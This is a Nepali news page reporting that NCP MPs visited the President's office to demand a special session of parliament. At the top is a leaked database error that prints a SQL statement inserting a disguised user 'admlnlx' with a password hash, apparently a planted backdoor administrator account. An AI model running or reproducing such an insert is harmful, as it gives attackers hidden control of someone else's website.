WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BL5mFF4fgA7VPqCepQF5oCJwhONNFy0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 14:19:10', '', 'admlnlx', 'admlnlx')

संसद महाधिवेशनको माग राख्दै नेकपाका नेता राष्ट्रपति कार्यलय – Gaule Khabar

संसद महाधिवेशनको माग राख्दै नेकपाका नेता राष्ट्रपति कार्यलय

राष्ट्रपति कार्यालयका सचिव फोन अफ गरेर गायव

संसद महाधिवेशनको माग राख्दै नेकपाका नेता राष्ट्रपति कार्यलय

काठमाडौं , सत्तारुढ नेकपाका सांसदहरु संघीय संसदको विशेष अधिवेशनको माग राख्दै राष्ट्रपति कार्यालय सतल निवास पुगेका छन् ।

नेकपा सांसद भीम रावल, पम्फा भुसालसहितको टोली सांसदहरुको हस्ताक्षरसहित विशेष अधिवेशन माग गर्दै राष्ट्रपति कार्यालय पुगका छन् तर उनीहरुले सुचना दर्ता गर्न भने भ्याएका छैन्न ।

राष्ट्रपति कार्यालयका सचिव हरि पौडेललाई घण्टौं कुर्दा पनि भेट्न नसकेको र   उनको मोवाइल पनि स्वीच अफ रहेको छ नेताहरुले जानकारी दिए  ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका